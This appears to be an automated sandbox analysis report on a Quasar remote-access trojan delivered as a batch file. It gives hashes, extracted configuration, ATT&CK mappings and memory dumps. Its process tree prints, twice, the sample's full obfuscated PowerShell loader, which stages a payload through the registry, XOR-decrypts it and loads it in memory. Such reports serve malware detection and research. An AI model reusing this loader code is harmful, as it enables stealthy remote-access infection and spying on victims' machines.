quasar | bfcdaed93c4c3605be7e800daac4299c4aa0df0218798cb64c2e2f01027989b2

General

Target

a.cmd
Size

4.2MB
MD5

8e53db2a2b188768e4c23344be407467
SHA1

99dd0a15c342904542a6f2f0b9eed3a8c68aff68
SHA256

bfcdaed93c4c3605be7e800daac4299c4aa0df0218798cb64c2e2f01027989b2
SHA512

d7533b52cd188b2f62ea35c0c7774fb5e5d1c824ac96221d8d32a8a73a4f4e29f73ef5cfb968e76def16c2c32f4a35ea6422e3945b9b2d6eb21809ec18a389b6
SSDEEP

49152:bXMw/hbcpR1DHQJLN+Z/8AEUCm5feXp8dv6Hkn1uX+OiqK67KFly6TteW5SEVAAl:G

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

Mutex

"&Rj@��:@b;��

Attributes

encryption_key
2F93492D384FEB71103635232F1BD56A2FEFBDE7
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/880-19-0x0000018EF9A70000-0x0000018EF9D9A000-memory.dmp	family_quasar

Blocklisted process makes network request 6 IoCs

flow	pid	Process
14	880	powershell.exe
21	880	powershell.exe
35	880	powershell.exe
39	880	powershell.exe
43	880	powershell.exe
44	880	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
880	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
880	powershell.exe
880	powershell.exe
880	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	880	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
880	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 4752	2972	cmd.exe	86
PID 2972 wrote to memory of 4752	2972	cmd.exe	86
PID 4752 wrote to memory of 880	4752	conhost.exe	87
PID 4752 wrote to memory of 880	4752	conhost.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Windows\system32\conhost.exe
  conhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\a.cmd';${kd`OTvshygfkWqz} = .([char](((-14750 -Band 8742) + (-14750 -Bor 8742) + 7778 - 1699))+[char](((-3885 -Band 1045) + (-3885 -Bor 1045) - 4263 + 7204))+[char](((-8757 -Band 2626) + (-8757 -Bor 2626) + 2514 + 3733))+[char](((-1429 -Band 8075) + (-1429 -Bor 8075) + 2571 - 9172))+[char]((6708 - 8850 + 6131 - 3922))+[char]((20409 - 8699 - 2979 - 8620))+[char]((-225 - 6768 + 1896 + 5207))+[char]((14212 - 9087 - 3231 - 1778))+[char]((-3397 - 842 + 3123 + 1217))+[char](((1337 -Band 1487) + (1337 -Bor 1487) - 9959 + 7245))+[char]((-5146 - 574 + 1549 + 4287))) $kdOt_fILe -Raw;$KDOtbmoqtlKbef = ([SYsTem.TeXT.encODINg]::UTf8.gEtsTRiNG((72, 75, 67, 85, 58, 0x5c, 83, 111, 102, 116, 0x77, 97, 114, 101, 0x5c, 0x43, 0x68, 0x72, 111, 109, 0x65, 85, 112)) + [SYSTem.TEXT.ENCOdiNg]::UTf8.GetSTrinG((100, 97, 116, 0x65, 54, 105, 100, 111, 0x76)));if (-not (.([char]((15732 - 8133 + 432 - 7947))+[char]((19257 - 7156 - 9718 - 2282))+[char](((-2734 -Band 4889) + (-2734 -Bor 4889) + 5262 - 7302))+[char]((9588 - 4977 + 2556 - 7051))+[char]((-2864 - 4413 + 8947 - 1625))+[char](((-8636 -Band 1645) + (-8636 -Bor 1645) - 2511 + 9582))+[char](((-3354 -Band 4437) + (-3354 -Bor 4437) + 4248 - 5234))+[char](((892 -Band 9414) + (892 -Bor 9414) - 8468 - 1722))+[char](((-26991 -Band 8995) + (-26991 -Bor 8995) + 8283 + 9817))) $kdOtBMOQtlkbEF)) { .([char]((19517 - 7856 - 3443 - 8140))+[char]((9609 - 410 - 1625 - 7473))+[char](((-16567 -Band 8743) + (-16567 -Bor 8743) + 6179 + 1764))+[char]((8472 - 2614 - 5448 - 365))+[char](((-4905 -Band 5487) + (-4905 -Bor 5487) - 4009 + 3500))+[char]((17129 - 3580 - 5916 - 7517))+[char](((-334 -Band 987) + (-334 -Bor 987) - 4441 + 3889))+[char]((2919 - 3613 + 5539 - 4736))) -Path $KdOtBMOQtlKbEf -Force };1..3 | .([char]((5230 - 3406 + 4954 - 6741))) {.([char]((13622 - 3875 - 1701 - 7963))+[char](((-2220 -Band 3626) + (-2220 -Bor 3626) - 3277 + 1972))+[char](((-6904 -Band 7564) + (-6904 -Bor 7564) - 2348 + 1804))+[char]((20570 - 3263 - 7526 - 9736))+[char]((14089 - 319 - 9486 - 4211))+[char]((5210 - 7844 + 7448 - 4698))+[char]((-3544 - 1541 + 1919 + 3267))+[char]((-10168 - 4861 + 8079 + 7059))+[char]((9248 - 8742 - 8501 + 8075))+[char]((10753 - 2291 - 5809 - 2539))+[char](((-5427 -Band 1323) + (-5427 -Bor 1323) + 7263 - 3048))+[char]((-695 - 1116 - 1123 + 3046))+[char](((-469 -Band 5539) + (-469 -Bor 5539) + 427 - 5396))+[char]((7556 - 8591 + 1345 - 196))+[char](((-13963 -Band 7760) + (-13963 -Bor 7760) - 2652 + 8971))+[char]((-285 - 373 + 735 + 44))) -Path $kDOtBmoqtLkBef -Name (([SYSTeM.TEXt.encoDING]::Utf8.GETsTRIng((0x4b, 0x44, 0x4f)) + [SysTEM.teXT.EncoDiNg]::utF8.GetstrIng(84))+$_) -Value (${KDOTvSh`YG`Fkwqz} | .([char]((281 - 716 - 6236 + 6754))+[char]((-880 - 5976 + 5141 + 1816))+[char](((750 -Band 9582) + (750 -Bor 9582) - 4152 - 6072))+[char]((-2961 - 3861 + 6110 + 813))+[char]((-508 - 1973 - 5327 + 7907))+[char]((1349 - 1221 + 6754 - 6766))+[char](((-16074 -Band 3997) + (-16074 -Bor 3997) + 5113 + 7009))+[char]((14865 - 4694 - 1572 - 8516))+[char]((7287 - 2419 - 2735 - 2017))+[char]((7818 - 929 - 7680 + 905))+[char]((9979 - 6348 - 6206 + 2680))+[char]((3538 - 9003 - 4373 + 9948))+[char](((-194 -Band 3911) + (-194 -Bor 3911) - 6575 + 2961))) -Pattern (([sySTEm.tExT.eNcodiNG]::uTf8.gETsTring((0x3a, 0x4b, 0x44, 0x4f)) + [sYsTeM.Text.ENcoDing]::utf8.GeTStRinG(84))+$_+([sYStEM.tExt.eNCoDinG]::UTF8.GeTstRING((58, 58)) + [syStEM.text.ENCOdIng]::UTF8.GetsTRinG((40, 46, 42, 41))))).matches.grOUPS[1].VAlue -Force};.([char]((-886 - 28 - 35 + 1032))+[char]((-761 - 4941 + 7273 - 1470))+[char]((7374 - 2058 + 2879 - 8079))+[char]((-5821 - 2214 + 8534 - 454))+[char](((-25447 -Band 9661) + (-25447 -Bor 9661) + 7083 + 8776))+[char](((-23455 -Band 9818) + (-23455 -Bor 9818) + 9297 + 4456))+[char](((-6428 -Band 4075) + (-6428 -Bor 4075) - 1283 + 3737))+[char](((-17878 -Band 1703) + (-17878 -Bor 1703) + 9351 + 6933))+[char]((-4143 - 2770 + 7712 - 719))+[char]((17249 - 8050 - 3465 - 5620))+[char](((-10170 -Band 9313) + (-10170 -Bor 9313) + 4107 - 3139))+[char]((1901 - 785 - 9888 + 8884))+[char]((8557 - 3578 - 821 - 4057))+[char](((-5146 -Band 3353) + (-5146 -Bor 3353) + 4090 - 2183))+[char]((1171 - 1513 + 9247 - 8789))+[char]((2522 - 5998 + 912 + 2685))) -Path $KdoTbmOQtLKbeF -Name ([sySTEm.tEXt.ENCoDiNG]::utf8.getsTrIng((75, 68, 79)) + [sYSTEM.tExt.EncodINg]::utF8.gEtStrinG((84, 52))) -Value ([SYsTEM.TEXT.ENCoDing]::utF8.GeTstRInG((73, 106, 69, 67, 86, 56, 84, 80, 74, 88, 76, 107, 66, 55, 48, 117))) -Force;${k`DOtttPPe`ZraFi} = [SYSteM.TExT.eNCoDInG]::UTF8.gETBYteS((.([char]((-6530 - 7684 + 4771 + 9514))+[char]((3714 - 9852 - 3645 + 9884))+[char]((1324 - 5556 + 644 + 3704))+[char](((-4147 -Band 6727) + (-4147 -Bor 6727) - 8734 + 6199))+[char](((4845 -Band 3263) + (4845 -Bor 3263) - 1255 - 6780))+[char]((7917 - 6788 - 5342 + 4329))+[char](((6331 -Band 3572) + (6331 -Bor 3572) - 2969 - 6833))+[char]((21235 - 6007 - 7708 - 7411))+[char](((-795 -Band 3035) + (-795 -Bor 3035) + 4931 - 7091))+[char]((-3411 - 4619 + 7921 + 223))+[char]((13446 - 1786 - 4349 - 7200))+[char](((-1217 -Band 9401) + (-1217 -Bor 9401) - 540 - 7532))+[char]((-1221 - 1063 + 8983 - 6598))+[char](((2905 -Band 57) + (2905 -Bor 57) - 1658 - 1190))+[char]((21808 - 7648 - 5793 - 8251))+[char]((-1881 - 3141 + 9522 - 4379))) -Path $KDOtBmOqtLKBef KDOT4).kDot4);${`Kdot`XQjEw`Inego} = [CoNvert]::FrOMBaSE64StRiNg((.([char]((480 - 1598 + 6824 - 5635))+[char](((-8522 -Band 6253) + (-8522 -Bor 6253) + 5667 - 3297))+[char](((-20193 -Band 5067) + (-20193 -Bor 5067) + 7759 + 7483))+[char](((-17922 -Band 6310) + (-17922 -Bor 6310) + 4973 + 6684))+[char](((-10123 -Band 9428) + (-10123 -Bor 9428) + 1246 - 478))+[char](((-20709 -Band 5925) + (-20709 -Bor 5925) + 7895 + 7005))+[char]((-7490 - 5819 + 7058 + 6352))+[char]((14683 - 9715 - 5282 + 423))+[char](((-18847 -Band 9498) + (-18847 -Bor 9498) + 1791 + 7638))+[char]((-7266 - 1582 - 445 + 9407))+[char]((6628 - 3923 + 2692 - 5286))+[char]((5109 - 9189 + 6227 - 2035))+[char]((8399 - 8486 - 5273 + 5461))+[char](((3539 -Band 4269) + (3539 -Bor 4269) - 8376 + 682))+[char]((11064 - 3164 - 6494 - 1290))+[char]((-6505 - 2289 + 5881 + 3034))) -Path $kdOTBMoqtLkBeF KDOT1).KdoT1);$KdOtbhBtrrrWvn = [BytE[]]::NeW(${`KDOtXqjeWine`G`O}.LeNGtH);for (${KDotZqravJjWvK}=0;${`K`DotzQrav`J`JWvk} -lt ${kdotXQJeWIneGO}.LenGth;${kd`OtzqravJ`Jwvk}++) {$KDotbHbtrrrwvn[${KdotzqravjjwvK}]=${K`DotxqjEWinego}[${KdotzqravjJwvK}] -bxor ${KdOtttPpe`ZraF`I}[${k`DotZ`Qravj`Jwvk} % ${`Kd`Ott`T`Ppezrafi}.LEngtH]};[SyStEM.rEfLECTion.ASsEmBlY]::LOaD($KDOtBhbtrrrwvn).EntRyPoInT.INVOkE($nULL,@(,[string[]]@()))"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\a.cmd';${kd`OTvshygfkWqz} = .([char](((-14750 -Band 8742) + (-14750 -Bor 8742) + 7778 - 1699))+[char](((-3885 -Band 1045) + (-3885 -Bor 1045) - 4263 + 7204))+[char](((-8757 -Band 2626) + (-8757 -Bor 2626) + 2514 + 3733))+[char](((-1429 -Band 8075) + (-1429 -Bor 8075) + 2571 - 9172))+[char]((6708 - 8850 + 6131 - 3922))+[char]((20409 - 8699 - 2979 - 8620))+[char]((-225 - 6768 + 1896 + 5207))+[char]((14212 - 9087 - 3231 - 1778))+[char]((-3397 - 842 + 3123 + 1217))+[char](((1337 -Band 1487) + (1337 -Bor 1487) - 9959 + 7245))+[char]((-5146 - 574 + 1549 + 4287))) $kdOt_fILe -Raw;$KDOtbmoqtlKbef = ([SYsTem.TeXT.encODINg]::UTf8.gEtsTRiNG((72, 75, 67, 85, 58, 0x5c, 83, 111, 102, 116, 0x77, 97, 114, 101, 0x5c, 0x43, 0x68, 0x72, 111, 109, 0x65, 85, 112)) + [SYSTem.TEXT.ENCOdiNg]::UTf8.GetSTrinG((100, 97, 116, 0x65, 54, 105, 100, 111, 0x76)));if (-not (.([char]((15732 - 8133 + 432 - 7947))+[char]((19257 - 7156 - 9718 - 2282))+[char](((-2734 -Band 4889) + (-2734 -Bor 4889) + 5262 - 7302))+[char]((9588 - 4977 + 2556 - 7051))+[char]((-2864 - 4413 + 8947 - 1625))+[char](((-8636 -Band 1645) + (-8636 -Bor 1645) - 2511 + 9582))+[char](((-3354 -Band 4437) + (-3354 -Bor 4437) + 4248 - 5234))+[char](((892 -Band 9414) + (892 -Bor 9414) - 8468 - 1722))+[char](((-26991 -Band 8995) + (-26991 -Bor 8995) + 8283 + 9817))) $kdOtBMOQtlkbEF)) { .([char]((19517 - 7856 - 3443 - 8140))+[char]((9609 - 410 - 1625 - 7473))+[char](((-16567 -Band 8743) + (-16567 -Bor 8743) + 6179 + 1764))+[char]((8472 - 2614 - 5448 - 365))+[char](((-4905 -Band 5487) + (-4905 -Bor 5487) - 4009 + 3500))+[char]((17129 - 3580 - 5916 - 7517))+[char](((-334 -Band 987) + (-334 -Bor 987) - 4441 + 3889))+[char]((2919 - 3613 + 5539 - 4736))) -Path $KdOtBMOQtlKbEf -Force };1..3 | .([char]((5230 - 3406 + 4954 - 6741))) {.([char]((13622 - 3875 - 1701 - 7963))+[char](((-2220 -Band 3626) + (-2220 -Bor 3626) - 3277 + 1972))+[char](((-6904 -Band 7564) + (-6904 -Bor 7564) - 2348 + 1804))+[char]((20570 - 3263 - 7526 - 9736))+[char]((14089 - 319 - 9486 - 4211))+[char]((5210 - 7844 + 7448 - 4698))+[char]((-3544 - 1541 + 1919 + 3267))+[char]((-10168 - 4861 + 8079 + 7059))+[char]((9248 - 8742 - 8501 + 8075))+[char]((10753 - 2291 - 5809 - 2539))+[char](((-5427 -Band 1323) + (-5427 -Bor 1323) + 7263 - 3048))+[char]((-695 - 1116 - 1123 + 3046))+[char](((-469 -Band 5539) + (-469 -Bor 5539) + 427 - 5396))+[char]((7556 - 8591 + 1345 - 196))+[char](((-13963 -Band 7760) + (-13963 -Bor 7760) - 2652 + 8971))+[char]((-285 - 373 + 735 + 44))) -Path $kDOtBmoqtLkBef -Name (([SYSTeM.TEXt.encoDING]::Utf8.GETsTRIng((0x4b, 0x44, 0x4f)) + [SysTEM.teXT.EncoDiNg]::utF8.GetstrIng(84))+$_) -Value (${KDOTvSh`YG`Fkwqz} | .([char]((281 - 716 - 6236 + 6754))+[char]((-880 - 5976 + 5141 + 1816))+[char](((750 -Band 9582) + (750 -Bor 9582) - 4152 - 6072))+[char]((-2961 - 3861 + 6110 + 813))+[char]((-508 - 1973 - 5327 + 7907))+[char]((1349 - 1221 + 6754 - 6766))+[char](((-16074 -Band 3997) + (-16074 -Bor 3997) + 5113 + 7009))+[char]((14865 - 4694 - 1572 - 8516))+[char]((7287 - 2419 - 2735 - 2017))+[char]((7818 - 929 - 7680 + 905))+[char]((9979 - 6348 - 6206 + 2680))+[char]((3538 - 9003 - 4373 + 9948))+[char](((-194 -Band 3911) + (-194 -Bor 3911) - 6575 + 2961))) -Pattern (([sySTEm.tExT.eNcodiNG]::uTf8.gETsTring((0x3a, 0x4b, 0x44, 0x4f)) + [sYsTeM.Text.ENcoDing]::utf8.GeTStRinG(84))+$_+([sYStEM.tExt.eNCoDinG]::UTF8.GeTstRING((58, 58)) + [syStEM.text.ENCOdIng]::UTF8.GetsTRinG((40, 46, 42, 41))))).matches.grOUPS[1].VAlue -Force};.([char]((-886 - 28 - 35 + 1032))+[char]((-761 - 4941 + 7273 - 1470))+[char]((7374 - 2058 + 2879 - 8079))+[char]((-5821 - 2214 + 8534 - 454))+[char](((-25447 -Band 9661) + (-25447 -Bor 9661) + 7083 + 8776))+[char](((-23455 -Band 9818) + (-23455 -Bor 9818) + 9297 + 4456))+[char](((-6428 -Band 4075) + (-6428 -Bor 4075) - 1283 + 3737))+[char](((-17878 -Band 1703) + (-17878 -Bor 1703) + 9351 + 6933))+[char]((-4143 - 2770 + 7712 - 719))+[char]((17249 - 8050 - 3465 - 5620))+[char](((-10170 -Band 9313) + (-10170 -Bor 9313) + 4107 - 3139))+[char]((1901 - 785 - 9888 + 8884))+[char]((8557 - 3578 - 821 - 4057))+[char](((-5146 -Band 3353) + (-5146 -Bor 3353) + 4090 - 2183))+[char]((1171 - 1513 + 9247 - 8789))+[char]((2522 - 5998 + 912 + 2685))) -Path $KdoTbmOQtLKbeF -Name ([sySTEm.tEXt.ENCoDiNG]::utf8.getsTrIng((75, 68, 79)) + [sYSTEM.tExt.EncodINg]::utF8.gEtStrinG((84, 52))) -Value ([SYsTEM.TEXT.ENCoDing]::utF8.GeTstRInG((73, 106, 69, 67, 86, 56, 84, 80, 74, 88, 76, 107, 66, 55, 48, 117))) -Force;${k`DOtttPPe`ZraFi} = [SYSteM.TExT.eNCoDInG]::UTF8.gETBYteS((.([char]((-6530 - 7684 + 4771 + 9514))+[char]((3714 - 9852 - 3645 + 9884))+[char]((1324 - 5556 + 644 + 3704))+[char](((-4147 -Band 6727) + (-4147 -Bor 6727) - 8734 + 6199))+[char](((4845 -Band 3263) + (4845 -Bor 3263) - 1255 - 6780))+[char]((7917 - 6788 - 5342 + 4329))+[char](((6331 -Band 3572) + (6331 -Bor 3572) - 2969 - 6833))+[char]((21235 - 6007 - 7708 - 7411))+[char](((-795 -Band 3035) + (-795 -Bor 3035) + 4931 - 7091))+[char]((-3411 - 4619 + 7921 + 223))+[char]((13446 - 1786 - 4349 - 7200))+[char](((-1217 -Band 9401) + (-1217 -Bor 9401) - 540 - 7532))+[char]((-1221 - 1063 + 8983 - 6598))+[char](((2905 -Band 57) + (2905 -Bor 57) - 1658 - 1190))+[char]((21808 - 7648 - 5793 - 8251))+[char]((-1881 - 3141 + 9522 - 4379))) -Path $KDOtBmOqtLKBef KDOT4).kDot4);${`Kdot`XQjEw`Inego} = [CoNvert]::FrOMBaSE64StRiNg((.([char]((480 - 1598 + 6824 - 5635))+[char](((-8522 -Band 6253) + (-8522 -Bor 6253) + 5667 - 3297))+[char](((-20193 -Band 5067) + (-20193 -Bor 5067) + 7759 + 7483))+[char](((-17922 -Band 6310) + (-17922 -Bor 6310) + 4973 + 6684))+[char](((-10123 -Band 9428) + (-10123 -Bor 9428) + 1246 - 478))+[char](((-20709 -Band 5925) + (-20709 -Bor 5925) + 7895 + 7005))+[char]((-7490 - 5819 + 7058 + 6352))+[char]((14683 - 9715 - 5282 + 423))+[char](((-18847 -Band 9498) + (-18847 -Bor 9498) + 1791 + 7638))+[char]((-7266 - 1582 - 445 + 9407))+[char]((6628 - 3923 + 2692 - 5286))+[char]((5109 - 9189 + 6227 - 2035))+[char]((8399 - 8486 - 5273 + 5461))+[char](((3539 -Band 4269) + (3539 -Bor 4269) - 8376 + 682))+[char]((11064 - 3164 - 6494 - 1290))+[char]((-6505 - 2289 + 5881 + 3034))) -Path $kdOTBMoqtLkBeF KDOT1).KdoT1);$KdOtbhBtrrrWvn = [BytE[]]::NeW(${`KDOtXqjeWine`G`O}.LeNGtH);for (${KDotZqravJjWvK}=0;${`K`DotzQrav`J`JWvk} -lt ${kdotXQJeWIneGO}.LenGth;${kd`OtzqravJ`Jwvk}++) {$KDotbHbtrrrwvn[${KdotzqravjjwvK}]=${K`DotxqjEWinego}[${KdotzqravjJwvK}] -bxor ${KdOtttPpe`ZraF`I}[${k`DotZ`Qravj`Jwvk} % ${`Kd`Ott`T`Ppezrafi}.LEngtH]};[SyStEM.rEfLECTion.ASsEmBlY]::LOaD($KDOtBhbtrrrwvn).EntRyPoInT.INVOkE($nULL,@(,[string[]]@()))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_utho1p0r.z4z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/880-16-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/880-13-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/880-17-0x0000018EF9800000-0x0000018EF9876000-memory.dmp

Filesize
472KB

Download
memory/880-12-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/880-18-0x0000018EF97A0000-0x0000018EF97BE000-memory.dmp

Filesize
120KB

Download
memory/880-14-0x0000018EF9750000-0x0000018EF9758000-memory.dmp

Filesize
32KB

Download
memory/880-15-0x0000018EF9760000-0x0000018EF976A000-memory.dmp

Filesize
40KB

Download
memory/880-19-0x0000018EF9A70000-0x0000018EF9D9A000-memory.dmp

Filesize
3.2MB

Download
memory/880-11-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/880-6-0x0000018EF7310000-0x0000018EF7332000-memory.dmp

Filesize
136KB

Download
memory/880-0-0x00007FFA89BB3000-0x00007FFA89BB5000-memory.dmp

Filesize
8KB

Download
memory/880-20-0x0000018EFA520000-0x0000018EFA570000-memory.dmp

Filesize
320KB

Download
memory/880-21-0x0000018EFA630000-0x0000018EFA6E2000-memory.dmp

Filesize
712KB

Download
memory/880-22-0x0000018EFA8C0000-0x0000018EFAA82000-memory.dmp

Filesize
1.8MB

Download
memory/880-23-0x00007FFA89BB3000-0x00007FFA89BB5000-memory.dmp

Filesize
8KB

Download
memory/880-24-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/880-25-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing